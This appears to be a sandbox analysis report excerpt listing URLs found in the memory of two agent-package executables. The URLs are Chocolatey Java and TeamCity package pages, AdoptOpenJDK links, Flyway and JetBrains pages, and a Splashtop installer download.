Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre8/8.0.202
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/teamcity-preinstalledjre/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/teamcity/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/TeamCity-OpenJDK8)
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/TeamCity-PreinstalledJRE)
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/Temurin11jre/11.0.25.9
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/Temurin17jre/17.0.13.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/Temurin8jre/8.432.6
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/Temurinjre/21.0.5.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11jre/11.0.11.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk12jre/12.0.2.10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk14jre/14.0.2.1200
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8jre/8.292.10.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8openj9jre/8.292.10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdkjre/16.0.1.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/asciidoctorj/2.5.13
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/corretto8jre/8.432.6.1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/flyway.commandline.withjre/10.21.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/javaruntime-platformspecific/7.0.79.20161125
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/josm/19265.0.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/jre6/6.0.43
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/liberica17jre/17.0.13.12
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/openjdk11jre/11.0.16.20220913
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/server-jre/8.0.192
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/server-jre10/10.0.1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/server-jre8/8.0.202
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/teamcity-preinstalledjre/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/packages/teamcity/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://confluence.jetbrains.com/display/TW/TeamCity
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://corretto.aws/downloads/resources/8.432.06.1/amazon-corretto-8.432.06.1-windows-x64-jre.msi
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.aws.amazon.com/corretto/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.jetbrains.com/teamcity/TeamCity-2024.12.tar.gz
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.splashtop.com
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001C9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001C5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exe
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://flywaydb.org/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://flywaydb.org/assets/logo/flyway-logo-tm-sm.png
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://flywaydb.org/documentation/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://flywaydb.org/documentation/releaseNotes
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/22ff3bb0f12b2d2cc5931ccc15c23ce3
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/2b9f2de1d50e6765981746ab4d853faa
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/3c8928b5ffeea000c44e9639f29bbca9
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/3fe416be589d4300d4bfdb08e730b1d5
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/417502a4b2bb60beaf06a03ae721fd65
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/50451618ceb903ae34ff3ea4da94e2b9
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/5ea7fb6fe5dba4cc274ba712b3885cc4
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/69c9395ea62bbc075a894a926fd1e9b8
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/718340558c14c0991bf4e341181c78ba
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/7d868ecf1a87a4ebf47a505c52785e3b
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/823207e4d91c3bfea7f4ecb9aaf5bfb1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/85c5bb14e90c18bc4d59ef0678d0e1f2
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/9807887be83b02bc89dfa3418a2c1be2
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/98ac9abf1a3d31bd698d5270cd7f37ee
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/af59d5a9d726c02f02de6737e3f2b73e
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/b45d3495f369c578c1951a3f768c8257
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/b5883cf2f8145998bba791af0ab05d0c
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/d603f431437f5a02261645bc3bc0af37
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/dd7574b4bb90b9f2110f929e6b3d3dfe
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/e20b8dec4788263bb51a5dd3c597d234
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/e276dc8bd7f45de5f78c02c9113e2819
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/f595bb6600148591ff351e221d8ce435
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/choco-bot/f6ddc5ed017de43b87d59ec377198c00
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk12u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk14u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk16/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk8u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/O
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk12-binaries/releases/download/jdk-12.0.2%2B10/OpenJDK12U-jre_
